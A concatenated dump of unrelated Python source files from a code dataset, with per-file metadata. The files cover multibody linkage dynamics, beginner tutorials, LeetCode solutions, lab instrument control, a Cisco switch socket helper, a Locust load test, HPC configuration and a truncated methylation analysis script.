self.Mbar_rbs_crank_mcs_act[:,0:1]\n j13 = self.Mbar_ground_mcs_act[:,1:2]\n j14 = self.Mbar_ground_mcs_act[:,0:1]\n j15 = self.P_rbs_conct\n j16 = self.Mbar_rbs_rockr_jcs_c[:,0:1]\n j17 = self.P_rbs_rockr\n j18 = A(j17).T\n j19 = self.Mbar_rbs_conct_jcs_c[:,0:1]\n j20 = self.Mbar_ground_jcs_d[:,2:3]\n j21 = j20.T\n j22 = self.Mbar_rbs_rockr_jcs_d[:,0:1]\n j23 = self.Mbar_rbs_rockr_jcs_d[:,1:2]\n j24 = B(j1,j20)\n\n self.jac_eq_blocks = [j0,\n B(j1,self.ubar_ground_jcs_a),\n j9,\n -1*B(j5,self.ubar_rbs_crank_jcs_a),\n j2,\n multi_dot([j4,j6,B(j1,j7)]),\n j2,\n multi_dot([j7.T,j10,j11]),\n j2,\n multi_dot([j4,j6,B(j1,j8)]),\n j2,\n multi_dot([j8.T,j10,j11]),\n j2,\n multi_dot([j12.T,j6,(cos(config.UF_mcs_act(t))*B(j1,j13) + -1*sin(config.UF_mcs_act(t))*B(j1,j14))]),\n j2,\n multi_dot([(cos(config.UF_mcs_act(t))*multi_dot([j13.T,j10]) + -1*sin(config.UF_mcs_act(t))*multi_dot([j14.T,j10])),B(j5,j12)]),\n j2,\n np.zeros((1,4),dtype=np.float64),\n j0[0:1,0:3],\n B(j5,self.ubar_rbs_crank_mcs_abs)[0:1,0:4],\n j0,\n B(j5,self.ubar_rbs_crank_jcs_b),\n j9,\n -1*B(j15,self.ubar_rbs_conct_jcs_b),\n j0,\n B(j15,self.ubar_rbs_conct_jcs_c),\n j9,\n -1*B(j17,self.ubar_rbs_rockr_jcs_c),\n j2,\n multi_dot([j16.T,j18,B(j15,j19)]),\n j2,\n multi_dot([j19.T,A(j15).T,B(j17,j16)]),\n j9,\n -1*B(j1,self.ubar_ground_jcs_d),\n j0,\n B(j17,self.ubar_rbs_rockr_jcs_d),\n j2,\n multi_dot([j22.T,j18,j24]),\n j2,\n multi_dot([j21,j10,B(j17,j22)]),\n j2,\n multi_dot([j23.T,j18,j24]),\n j2,\n multi_dot([j21,j10,B(j17,j23)]),\n j0,\n np.zeros((3,4),dtype=np.float64),\n np.zeros((4,3),dtype=np.float64),\n np.eye(4, dtype=np.float64),\n 2*j5.T,\n 2*j15.T,\n 2*j17.T]\n\n \n def eval_mass_eq(self):\n config = self.config\n t = self.t\n\n m0 = np.eye(3, dtype=np.float64)\n m1 = G(self.P_ground)\n m2 = G(self.P_rbs_crank)\n m3 = G(self.P_rbs_conct)\n m4 = G(self.P_rbs_rockr)\n\n self.mass_eq_blocks = [self.m_ground*m0,\n 4*multi_dot([m1.T,self.Jbar_ground,m1]),\n config.m_rbs_crank*m0,\n 4*multi_dot([m2.T,config.Jbar_rbs_crank,m2]),\n config.m_rbs_conct*m0,\n 4*multi_dot([m3.T,config.Jbar_rbs_conct,m3]),\n config.m_rbs_rockr*m0,\n 4*multi_dot([m4.T,config.Jbar_rbs_rockr,m4])]\n\n \n def eval_frc_eq(self):\n config = self.config\n t = self.t\n\n f0 = G(self.Pd_rbs_crank)\n f1 = G(self.Pd_rbs_conct)\n f2 = G(self.Pd_rbs_rockr)\n\n self.frc_eq_blocks = [np.zeros((3,1),dtype=np.float64),\n np.zeros((4,1),dtype=np.float64),\n self.F_rbs_crank_gravity,\n 8*multi_dot([f0.T,config.Jbar_rbs_crank,f0,self.P_rbs_crank]),\n self.F_rbs_conct_gravity,\n 8*multi_dot([f1.T,config.Jbar_rbs_conct,f1,self.P_rbs_conct]),\n self.F_rbs_rockr_gravity,\n 8*multi_dot([f2.T,config.Jbar_rbs_rockr,f2,self.P_rbs_rockr])]\n\n \n def eval_reactions_eq(self):\n config = self.config\n t = self.t\n\n Q_ground_jcs_a = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64),np.zeros((1,3),dtype=np.float64).T,np.zeros((1,3),dtype=np.float64).T],[B(self.P_ground,self.ubar_ground_jcs_a).T,multi_dot([B(self.P_ground,self.Mbar_ground_jcs_a[:,0:1]).T,A(self.P_rbs_crank),self.Mbar_rbs_crank_jcs_a[:,2:3]]),multi_dot([B(self.P_ground,self.Mbar_ground_jcs_a[:,1:2]).T,A(self.P_rbs_crank),self.Mbar_rbs_crank_jcs_a[:,2:3]])]]),self.L_jcs_a])\n self.F_ground_jcs_a = Q_ground_jcs_a[0:3,0:1]\n Te_ground_jcs_a = Q_ground_jcs_a[3:7,0:1]\n self.T_ground_jcs_a = (-1*multi_dot([skew(multi_dot([A(self.P_ground),self.ubar_ground_jcs_a])),self.F_ground_jcs_a]) + 0.5*multi_dot([E(self.P_ground),Te_ground_jcs_a]))\n Q_ground_mcs_act = -1*multi_dot([np.bmat([[np.zeros((1,3),dtype=np.float64).T],[multi_dot([(-1*sin(config.UF_mcs_act(t))*B(self.P_ground,self.Mbar_ground_mcs_act[:,0:1]).T + cos(config.UF_mcs_act(t))*B(self.P_ground,self.Mbar_ground_mcs_act[:,1:2]).T),A(self.P_rbs_crank),self.Mbar_rbs_crank_mcs_act[:,0:1]])]]),self.L_mcs_act])\n self.F_ground_mcs_act = Q_ground_mcs_act[0:3,0:1]\n Te_ground_mcs_act = Q_ground_mcs_act[3:7,0:1]\n self.T_ground_mcs_act = 0.5*multi_dot([E(self.P_ground),Te_ground_mcs_act])\n Q_rbs_crank_mcs_abs = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64)[0:1,0:3].T],[B(self.P_rbs_crank,self.ubar_rbs_crank_mcs_abs)[0:1,0:4].T]]),self.L_mcs_abs])\n self.F_rbs_crank_mcs_abs = Q_rbs_crank_mcs_abs[0:3,0:1]\n Te_rbs_crank_mcs_abs = Q_rbs_crank_mcs_abs[3:7,0:1]\n self.T_rbs_crank_mcs_abs = (-1*multi_dot([skew(multi_dot([A(self.P_rbs_crank),self.ubar_rbs_crank_mcs_abs])),self.F_rbs_crank_mcs_abs]) + 0.5*multi_dot([E(self.P_rbs_crank),Te_rbs_crank_mcs_abs]))\n Q_rbs_crank_jcs_b = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64)],[B(self.P_rbs_crank,self.ubar_rbs_crank_jcs_b).T]]),self.L_jcs_b])\n self.F_rbs_crank_jcs_b = Q_rbs_crank_jcs_b[0:3,0:1]\n Te_rbs_crank_jcs_b = Q_rbs_crank_jcs_b[3:7,0:1]\n self.T_rbs_crank_jcs_b = (-1*multi_dot([skew(multi_dot([A(self.P_rbs_crank),self.ubar_rbs_crank_jcs_b])),self.F_rbs_crank_jcs_b]) + 0.5*multi_dot([E(self.P_rbs_crank),Te_rbs_crank_jcs_b]))\n Q_rbs_conct_jcs_c = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64),np.zeros((1,3),dtype=np.float64).T],[B(self.P_rbs_conct,self.ubar_rbs_conct_jcs_c).T,multi_dot([B(self.P_rbs_conct,self.Mbar_rbs_conct_jcs_c[:,0:1]).T,A(self.P_rbs_rockr),self.Mbar_rbs_rockr_jcs_c[:,0:1]])]]),self.L_jcs_c])\n self.F_rbs_conct_jcs_c = Q_rbs_conct_jcs_c[0:3,0:1]\n Te_rbs_conct_jcs_c = Q_rbs_conct_jcs_c[3:7,0:1]\n self.T_rbs_conct_jcs_c = (-1*multi_dot([skew(multi_dot([A(self.P_rbs_conct),self.ubar_rbs_conct_jcs_c])),self.F_rbs_conct_jcs_c]) + 0.5*multi_dot([E(self.P_rbs_conct),Te_rbs_conct_jcs_c]))\n Q_rbs_rockr_jcs_d = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64),np.zeros((1,3),dtype=np.float64).T,np.zeros((1,3),dtype=np.float64).T],[B(self.P_rbs_rockr,self.ubar_rbs_rockr_jcs_d).T,multi_dot([B(self.P_rbs_rockr,self.Mbar_rbs_rockr_jcs_d[:,0:1]).T,A(self.P_ground),self.Mbar_ground_jcs_d[:,2:3]]),multi_dot([B(self.P_rbs_rockr,self.Mbar_rbs_rockr_jcs_d[:,1:2]).T,A(self.P_ground),self.Mbar_ground_jcs_d[:,2:3]])]]),self.L_jcs_d])\n self.F_rbs_rockr_jcs_d = Q_rbs_rockr_jcs_d[0:3,0:1]\n Te_rbs_rockr_jcs_d = Q_rbs_rockr_jcs_d[3:7,0:1]\n self.T_rbs_rockr_jcs_d = (-1*multi_dot([skew(multi_dot([A(self.P_rbs_rockr),self.ubar_rbs_rockr_jcs_d])),self.F_rbs_rockr_jcs_d]) + 0.5*multi_dot([E(self.P_rbs_rockr),Te_rbs_rockr_jcs_d]))\n\n self.reactions = {'F_ground_jcs_a' : self.F_ground_jcs_a,\n 'T_ground_jcs_a' : self.T_ground_jcs_a,\n 'F_ground_mcs_act' : self.F_ground_mcs_act,\n 'T_ground_mcs_act' : self.T_ground_mcs_act,\n 'F_rbs_crank_mcs_abs' : self.F_rbs_crank_mcs_abs,\n 'T_rbs_crank_mcs_abs' : self.T_rbs_crank_mcs_abs,\n 'F_rbs_crank_jcs_b' : self.F_rbs_crank_jcs_b,\n 'T_rbs_crank_jcs_b' : self.T_rbs_crank_jcs_b,\n 'F_rbs_conct_jcs_c' : self.F_rbs_conct_jcs_c,\n 'T_rbs_conct_jcs_c' : self.T_rbs_conct_jcs_c,\n 'F_rbs_rockr_jcs_d' : self.F_rbs_rockr_jcs_d,\n 'T_rbs_rockr_jcs_d' : self.T_rbs_rockr_jcs_d}\n\n","sub_path":"tests/tests/fourbar.py","file_name":"fourbar.py","file_ext":"py","file_size_in_byte":21281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232297256","text":"# Dictionaries use keys and values to store information\n\nphonebook = {}\nphonebook[\"Alex\"] = 6145320125\nphonebook[\"Tracey\"] = 4324772025\nprint(phonebook)\n#OR\nspicyList = {\n \"Jalepeno\" : \"Sorta spicy\",\n \"Habenero\" : \"Very spicy\",\n \"Bhut Jolokia\" : \"Ultra spicy\"\n }\nprint(spicyList)\n\n# Iterating items in a dictionary is a bit more difficult than lists\nfor pepper, spiceIndex in spicyList.items():\n print(\"The %s is considered %s\" % (pepper, spiceIndex))\n \n# Removing values\ndel spicyList[\"Jalepeno\"]\n#OR\nspicyList.pop(\"Habenero\")\nprint(spicyList)\n\n#Exercise\nphonebook2 = {\n \"John\" : 938477566,\n \"Jack\" : 938377264,\n \"Jill\" : 947662781\n}\n\n# write your code here\nphonebook2[\"Jake\"] = 938273443 #Adding to a dictionary***************\nphonebook2.update({\"Peter\" : 6148330960})# Antoher way to add to a dictionary***********\nphonebook2.pop(\"Jill\")\nprint(phonebook2)\n\n# testing code\nif \"Jake\" in phonebook2:\n print(\"Jake is listed in the phonebook.\")\nif \"Jill\" not in phonebook2:\n print(\"Jill is not listed in the phonebook.\")\n","sub_path":"Dictionaries.py","file_name":"Dictionaries.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196513692","text":"class Solution(object):\n def numWays(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: int\n \"\"\"\n dp = [[0 for ni in range(n + 1)] for ki in range(k + 1)]\n for ki in range(1, k + 1):\n if n >= 1:\n dp[ki][1] = ki\n if n >= 2:\n dp[ki][2] = ki * ki\n for ni in range(3, n + 1):\n dp[ki][ni] = dp[ki][ni - 1] * (ki - 1) + \\\n dp[ki][ni - 2] * (ki - 1)\n return dp[k][n]\n\n\nsol = Solution()\nret = sol.numWays(3, 2)\nret = sol.numWays(3, 3)\nprint(ret)\n","sub_path":"src/paint-fence.py","file_name":"paint-fence.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"299853122","text":"### import ####################################################################\n\nimport WrightTools as wt\n\nimport yaqc_cmds.project.classes as pc\nimport yaqc_cmds.project.widgets as pw\nimport yaqc_cmds.somatic.acquisition as acquisition\nimport yaqc_cmds.hardware.opas as opas\n\n\n### define ####################################################################\n\n\nmodule_name = \"SHUTTER\"\n\n\n### Worker ####################################################################\n\n\nclass Worker(acquisition.Worker):\n def process(self, scan_folder):\n pass\n\n def run(self):\n for opa in opas.hardwares:\n opa = opa.driver\n if opa.shutter_port is None:\n continue\n opa.set_shutter([self.aqn.read(\"shutter\", opa.name)])\n if not self.stopped.read():\n self.finished.write(True) # only if acquisition successfull\n\n\n### GUI #######################################################################\n\n\nclass GUI(acquisition.GUI):\n def create_frame(self):\n # shared settings\n input_table = pw.InputTable()\n self.shutter_state = {\n hardware.name: pc.Bool() for hardware in opas.hardwares if hardware.driver.shutter_port\n }\n for k, v in self.shutter_state.items():\n input_table.add(k, v)\n self.layout.addWidget(input_table)\n\n def load(self, aqn_path):\n aqn = wt.kit.INI(aqn_path)\n for k, v in self.shutter_state.items():\n v.write(aqn.read(\"shutter\", k))\n\n def save(self, aqn_path):\n aqn = wt.kit.INI(aqn_path)\n aqn.write(\n \"info\",\n \"description\",\n f\"SHUTTER: {', '.join(k for k, v in self.shutter_state.items() if v.read())}\",\n )\n # shared settings\n aqn.add_section(\"shutter\")\n for k, v in self.shutter_state.items():\n aqn.write(\"shutter\", k, v.read())\n\n\ndef mkGUI():\n global gui\n gui = GUI(module_name)\n\n\ndef load():\n return True\n","sub_path":"yaqc_cmds/somatic/modules/set_shutter.py","file_name":"set_shutter.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264919106","text":"\"\"\"\r\n***************************************************************************************************\r\nThe script examples provided by Cisco for your use are provided for\r\nreference only as a customer courtesay.\r\n\r\nThey are intended to facilitate development of your own scripts and software\r\nthat interoperate with Cisco switches and software.\r\n\r\nAlthough Cisco has made efforts to create script examples that will be effective\r\nas aids to script or software development,\r\n\r\nCisco assumes no liability for or support obligations related to the use of the script examples or\r\nany results obtained using or referring to the script examples.\r\n\r\n***************************************************************************************************\r\nMenu - Beta Script - Test Prototype\r\n*** Combine Scrolled Text with Example Frame as Main Frame\r\nDate: 26 Nov 2012 -- R. Stellman\r\n\"\"\"\r\n\r\n# Nexus_Object.py program\r\n\r\nimport socket\r\n\r\nimport os\r\nfrom datetime import datetime\r\nimport time\r\nimport shutil\r\nfrom shutil import *\r\n\r\n\r\nclass Nexus_switch:\r\n\r\n def __init__(self, host, port):\r\n HOST = host # The remote host\r\n PORT = port # The same port as used by the server\r\n\r\n\r\n def s_socket(self,sbuffer,HOST,PORT):\r\n # Sends the buffer to the server\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((HOST, PORT))\r\n s.sendall(sbuffer)\r\n data = s.recv(6500)\r\n s.close()\r\n\r\n return(data)\r\n\r\n def s_read (self,fname = \"a.tmp\"):\r\n # Loads a file into the buffer string\r\n #\r\n nexusLogFile = fname\r\n bufferText=\" ... \"\r\n buffer1 = open(nexusLogFile,'r')\r\n bufferText = buffer1.read()\r\n buffer1.close()\r\n\r\n return(bufferText)\r\n\r\n def s_write (self,fname= \"/bootflash/a.tmp\", bufferText=\"\"):\r\n # ... Write to a file\r\n #\r\n bufferFile = open(fname, 'w')\r\n bufferFile.write(bufferText)\r\n bufferFile.close()\r\n \r\n return()\r\n\r\n def stringNexusFormat (self, bufferText, skip=0):\r\n \"\"\"\\n Format file data for Humans \"\"\"\r\n bufferText = bufferText.replace ('\"[','') \r\n bufferText = bufferText.replace (']','')\r\n bufferText = bufferText.replace (\"'\",\" \")\r\n bufferText = bufferText.replace ('\\\\',' ')\r\n bufferText = bufferText.replace ('\",','\"\\n') # Needed for 'show routes'\r\n bufferText = bufferText.replace (' ,','\\n')\r\n \r\n if (skip == 1): # Buffer Monitor; csv data\r\n bufferText = bufferText.replace (' n','\\n')\r\n \r\n return (bufferText)\r\n ","sub_path":"Nexus_Object.py","file_name":"Nexus_Object.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"229757446","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport time\nfrom locust import HttpUser, task, between\nfrom locust import LoadTestShape\nimport json\nfrom math import sin, pi\n\nclass ProfileLoad(LoadTestShape):\n '''\n This load profile starts at 0 and steps up by step_users\n increments every tick, up to target_users. After reaching\n target_user level, load will stay at target_user level\n until time_limit is reached.\n '''\n\n target_users = 70\n step_users = 5 # ramp users each step\n time_limit = 3600 # seconds\n\n def tick(self):\n num_steps = self.target_users/self.step_users\n run_time = round(self.get_run_time())\n\n if run_time < self.time_limit:\n if num_steps < run_time:\n user_count = num_steps * self.step_users\n else:\n user_count = self.target_users\n return (user_count,self.step_users)\n else:\n return None\n\nclass TritonUser(HttpUser):\n wait_time = between(1, 1)\n\n @task\n def bert_disconnect(self):\n response = self.client.post(self.url1, headers=self.headers, data=json.dumps(self.data))\n\n @task(3)\n def bert(self):\n response = self.client.post(self.url1, data=json.dumps(self.data))\n \n def on_start(self):\n with open('bert_request.json') as f:\n self.data = json.load(f)\n\n self.url1 = '{}/v2/models/{}/infer'.format(\n self.environment.host,\n 'bert-tier1')\n\n self.headers = {'Connection': 'close'}\n\n","sub_path":"model_serving/gke-triton-priority/locust/locustfile-tier1.py","file_name":"locustfile-tier1.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"563680659","text":"\n\n#must use python 2.7\n\nimport re\nimport os\n\n\ndef validCheck(a,b,c,d,e,f,g,h,i):\n if len(a) == 0:\n a.append('NULL')\n return a,b,c,d,e,f,g,h,i\n\n\n\ndef makeNew(a,b,c,d,e,f,g,h,i, outfile):\n for name in a:\n for streak in b:\n for color in c:\n for hardness in d:\n for cleavage in e: \n for fracture in f: \n for luster in g:\n for diaphaneity in h:\n for specificGravity in i:\n outfile.write('{},{},{},{},{},{},{},{},{}\\n'.format(name, streak, color, hardness, cleavage, fracture, luster, diaphaneity, specificGravity))\n\n\ndef parseline(line, infile, rx_entry, rx_stField, rx_endField):\n # we have one line. We need to separate out the fields of multiple values (e.g. Tormaline, \"blue, red, green\", ...)\n names = []\n streak = []\n color = []\n hardness = []\n cleavage = []\n fracture = []\n luster = []\n diaphaneity = []\n other = []\n specificGravity = []\n\n inGroup = False\n\n index = 0\n \n # all entries, split by entry with commas, strings, and quotes \n allEntries = line.split(',')\n naughtyCharacters = extraCharacters()\n\n for entry in allEntries:\n if re.match(rx_stField, entry):\n inGroup = True\n if re.match(rx_endField, entry):\n inGroup = False\n \n\n if index == 0:\n names.append(re.sub(naughtyCharacters, '', entry))\n if index == 1:\n streak.append(re.sub(naughtyCharacters, '', entry))\n if index == 2:\n color.append(re.sub(naughtyCharacters, '', entry))\n if index == 3:\n hardness.append(re.sub(naughtyCharacters, '', entry))\n if index == 4:\n cleavage.append(re.sub(naughtyCharacters, '', entry))\n if index == 5:\n fracture.append(re.sub(naughtyCharacters, '', entry))\n if index == 6:\n luster.append(re.sub(naughtyCharacters, '', entry))\n if index == 7:\n diaphaneity.append(re.sub(naughtyCharacters, '', entry))\n if index == 8:\n other.append(re.sub(naughtyCharacters, '', entry))\n if index == 9:\n specificGravity.append(re.sub(naughtyCharacters, '', entry))\n\n \n if inGroup == False:\n index += 1\n \n return names, streak, color, hardness, cleavage, fracture, luster, diaphaneity, specificGravity \n \n\n\ndef main():\n # setup input/output path and input/output file\n cwd = os.path.dirname(__file__) #absolute path to cwd\n infile = 'minerals.csv'\n inpath = os.path.join(cwd, infile)\n\n outfile = 'mineral_input.txt'\n outpath = os.path.join(cwd, outfile)\n\n \n # get regex objects for matching elements\n elem = elementSyntax()\n stField = startFieldSyntax()\n endField = endFieldSyntax()\n\n\n # pass input, output, regex for parsing\n # line at a time\n with open(inpath, 'r') as infile:\n with open(outpath, 'w') as outfile:\n for line in infile:\n a,b,c,d,e,f,g,h,i = parseline(line, infile, elem, stField, endField)\n #a,b,c,d,e,f,g,h,i = validCheck(a,b,c,d,e,f,g,h,i)\n makeNew(a,b,c,d,e,f,g,h,i, outfile) \n\n# any element of the mineral table\ndef elementSyntax():\n entry_syntax = re.compile(r'\"?.+,')\n return entry_syntax\n\n# an element that signifies the beginning of a field of values (e.g. colors for a mineral)\ndef startFieldSyntax():\n entry_syntax = re.compile(\"\\\".+\")\n return entry_syntax\n\n# an element that signifies the end of a field of values \ndef endFieldSyntax():\n entry_syntax = re.compile(\".+\\\"\")\n return entry_syntax\n\ndef extraCharacters():\n entry_syntax = re.compile(r'(^\\ )?(\")?(\\ $)?')\n return entry_syntax\n\n\n\n\nif __name__ == '__main__':\n main();\n","sub_path":"Data/Input/mineralParse.py","file_name":"mineralParse.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"80071969","text":"#\n# @lc app=leetcode id=83 lang=python3\n#\n# [83] Remove Duplicates from Sorted List\n#\n# https://leetcode.com/problems/remove-duplicates-from-sorted-list/description/\n#\n# algorithms\n# Easy (41.77%)\n# Total Accepted: 300.7K\n# Total Submissions: 718.4K\n# Testcase Example: '[1,1,2]'\n#\n# Given a sorted linked list, delete all duplicates such that each element\n# appear only once.\n# \n# Example 1:\n# \n# \n# Input: 1->1->2\n# Output: 1->2\n# \n# \n# Example 2:\n# \n# \n# Input: 1->1->2->3->3\n# Output: 1->2->3\n# \n# \n#\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n node = head\n while node:\n pre = node.next\n while pre and pre.val == node.val:\n pre = pre.next\n node.next = pre\n node = node.next\n return head\n","sub_path":"83.remove-duplicates-from-sorted-list.py","file_name":"83.remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"398232796","text":"\"\"\"\nFunctions to handle parsing the config file for multiple super computers\n\"\"\"\n\n#config data\n\nGALAXY_CONFIG = {'base_data_dir' : '/astro/mwavcs/vcs/',\n 'base_product_dir' : '/group/mwavcs/vcs/',\n 'group_account' : {'cpuq': '#SBATCH --account=pawsey0348',\n 'gpuq': '#SBATCH --account=mwavcs',\n 'copyq': '#SBATCH --account=mwavcs',\n 'zcpuq': '#SBATCH --account=mwavcs'},\n 'module_dir' : '/group/mwa/software/modulefiles',\n 'presto_module' : 'presto/master',\n 'psrcat_module' : 'psrcat/1.59',\n 'cpuq_cluster' : 'magnus',\n 'cpuq_partition' : 'workq',\n 'gpuq_cluster' : 'galaxy',\n 'gpuq_partition' : 'gpuq',\n 'gpu_beamform_mem' : '1024',\n 'zcpuq_cluster' : 'zeus',\n 'zcpuq_partition' : 'workq',\n 'copyq_cluster' : 'zeus',\n 'copyq_partition' : 'copyq',\n 'container_module' : '',\n 'container_command' : '',\n 'prschive_container' : '/pawsey/mwa/singularity/dspsr/dspsr.sif',\n 'ssd_dir' : None,\n 'gid' : 34858} # mwavcs\n\nGARRAWARLA_CONFIG = {'base_data_dir' : '/astro/mwavcs/vcs/',\n 'base_product_dir' : '/group/mwavcs/vcs/',\n 'group_account' : {'cpuq': '#SBATCH --account=mwavcs',\n 'gpuq': '#SBATCH --account=mwavcs',\n 'copyq': '#SBATCH --account=mwavcs',\n 'zcpuq': '#SBATCH --account=mwavcs'},\n 'module_dir' : '/pawsey/mwa/software/python3/modulefiles/',\n 'presto_module' : 'presto/master',\n 'psrcat_module' : 'psrcat/1.59',\n 'cpuq_cluster' : 'garrawarla',\n 'cpuq_partition' : 'workq',\n 'gpuq_cluster' : 'garrawarla',\n 'gpuq_partition' : 'gpuq',\n 'gpu_beamform_mem' : '25600',\n 'zcpuq_cluster' : 'zeus',\n 'zcpuq_partition' : 'workq',\n 'copyq_cluster' : 'zeus',\n 'copyq_partition' : 'copyq',\n 'container_module' : '', #'singularity',\n 'container_command' : '', #'singularity exec --nv /pawsey/mwa/singularity/vcstools_master.sif /bin/bash -c ',\n 'prschive_container' : '/pawsey/mwa/singularity/dspsr/dspsr.sif',\n 'ssd_dir' : '/nvmetmp',\n 'gid' : 34858} # mwavcs\n\nOZSTAR_CONFIG = {'base_data_dir' : '/fred/oz125/vcs/',\n 'base_product_dir' : '/fred/oz125/vcs/',\n 'group_account' : {'cpuq': '#SBATCH --account=oz125',\n 'gpuq': '#SBATCH --account=oz125',\n 'copyq': '#SBATCH --account=oz125',\n 'zcpuq': '#SBATCH --account=oz125'},\n #'module_dir' : '/fred/oz125/software/modulefiles\\nmodule use /apps/users/pulsar/skylake/modulefiles',\n 'module_dir' : '/fred/oz125/software/modulefiles',\n 'presto_module' : 'module use /apps/users/pulsar/skylake/modulefiles\\nmodule load presto/no-python',\n #'presto_module' : 'presto/no-python',\n 'psrcat_module' : 'psrcat/1.49',\n 'cpuq_cluster' : 'farnarkle',\n 'cpuq_partition' : 'skylake',\n 'gpuq_cluster' : 'farnarkle',\n 'gpuq_partition' : 'skylake-gpu',\n 'gpu_beamform_mem' : '25600',\n 'copyq_cluster' : 'farnarkle',\n 'copyq_partition' : 'skylake', #TODO check if there's a better one\n 'zcpuq_cluster' : 'farnarkle',\n 'zcpuq_partition' : 'skylake',\n 'container_module' : 'singularity/latest',\n #removed since I've now installed it on Ozstar\n #'container_command' : 'singularity exec -H /fred/oz125/vcs/1221832280/ --nv /fred/oz125/container_images/vcstools_multi-pixel.simg'\n 'container_command' : '',\n 'prschive_container' : '',\n 'ssd_dir' : '$JOBFS',\n 'gid' : 10169} # oz125\n\nARM_CONFIG = {'base_data_dir' : '/ibo9000/Pulsar/vcs/',\n 'base_product_dir' : '/ibo9000/Pulsar/vcs/',\n 'group_account' : {'cpuq': '',\n 'gpuq': '',\n 'copyq': '',\n 'zcpuq': ''},\n 'module_dir' : '/home/app/modulefiles/',\n 'presto_module' : 'presto/cpu-master',\n #'psrcat_module' : 'psrcat/1.49',\n 'cpuq_cluster' : 'chess',\n 'cpuq_partition' : 'arm',\n 'gpuq_cluster' : 'chess',\n 'gpuq_partition' : 'all-gpu',\n 'gpu_beamform_mem' : '30720',\n 'copyq_cluster' : 'chess',\n 'copyq_partition' : 'arm', #TODO check if there's a better one\n 'zcpuq_cluster' : 'chess',\n 'zcpuq_partition' : 'arm',\n #None currently as we haven't worked out container software\n 'container_module' : '',\n #'container_command' : 'docker run 192.168.6.123:5000/vcstools'}\n 'container_command' : '',\n 'prschive_container' : '',\n 'ssd_dir' : None,\n 'gid' : 10002} # pulsar\n\n\n\n\nimport logging\nimport socket\nimport argparse\n\nlogger = logging.getLogger(__name__)\n\ndef load_config_file():\n \"\"\"\n Work out which supercomputer you are using and load the appropriate config file\n \"\"\"\n #Work out which supercomputer you're using\n hostname = socket.gethostname()\n # galaxy head node, galaxy and magnus job nodes, zeus job nodes, garrawarla job nodes\n if hostname.startswith('galaxy') or hostname.startswith('nid') or hostname.startswith('z'):\n comp_config = GALAXY_CONFIG\n elif hostname.startswith('mwa') or hostname.startswith('garrawarla'):\n comp_config = GARRAWARLA_CONFIG\n elif hostname.startswith('john') or hostname.startswith('farnarkle'):\n comp_config = OZSTAR_CONFIG\n elif hostname.startswith('x86') or hostname.startswith('arm'):\n comp_config = ARM_CONFIG\n else:\n logger.error('Unknown computer {}. Exiting'.format(hostname))\n quit()\n\n return comp_config\n\n\nif __name__ == '__main__':\n\n # Dictionary for choosing log-levels\n loglevels = dict(DEBUG=logging.DEBUG,\n INFO=logging.INFO,\n WARNING=logging.WARNING)\n\n # Option parsing\n parser = argparse.ArgumentParser(\"Creates a config file (only required to be run on install or when a new supercomputer is added) and has functions for reading them.\")\n\n parser.add_argument(\"-L\", \"--loglvl\", type=str, help=\"Logger verbosity level. Default: INFO\",\n choices=loglevels.keys(), default=\"INFO\")\n\n parser.add_argument(\"-V\", \"--version\", action='store_true', help=\"Print version and quit\")\n args = parser.parse_args()\n\n if args.version:\n try:\n import version\n print(version.__version__)\n sys.exit(0)\n except ImportError as ie:\n print(\"Couldn't import version.py - have you installed vcstools?\")\n print(\"ImportError: {0}\".format(ie))\n sys.exit(0)\n\n # set up the logger for stand-alone execution\n logger.setLevel(loglevels[args.loglvl])\n ch = logging.StreamHandler()\n ch.setLevel(loglevels[args.loglvl])\n formatter = logging.Formatter('%(asctime)s %(filename)s %(name)s %(lineno)-4d %(levelname)-9s :: %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger.propagate = False\n\n\n #print config file\n config = load_config_file()\n for i in config.keys():\n logger.info(\"{0}\\t{1}\".format(i,config[i]))\n\n","sub_path":"vcstools/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"543115408","text":"import sys, os\nsys.path.append('/lustre/users/wangxinmei/JYModule/')\n\nfrom MethyModule.MethyStatPicPro import StatPic\nfrom MethyModule.MethyStatisticsPro import CStatistics, mCStatistics\nfrom StaticNames import Names\nfrom CommonMethods import saveInterVar, Template\n\ndef myGetCoverage_ContextByGene(project_path, covReport, refSeqBedFile, sampleName):\n 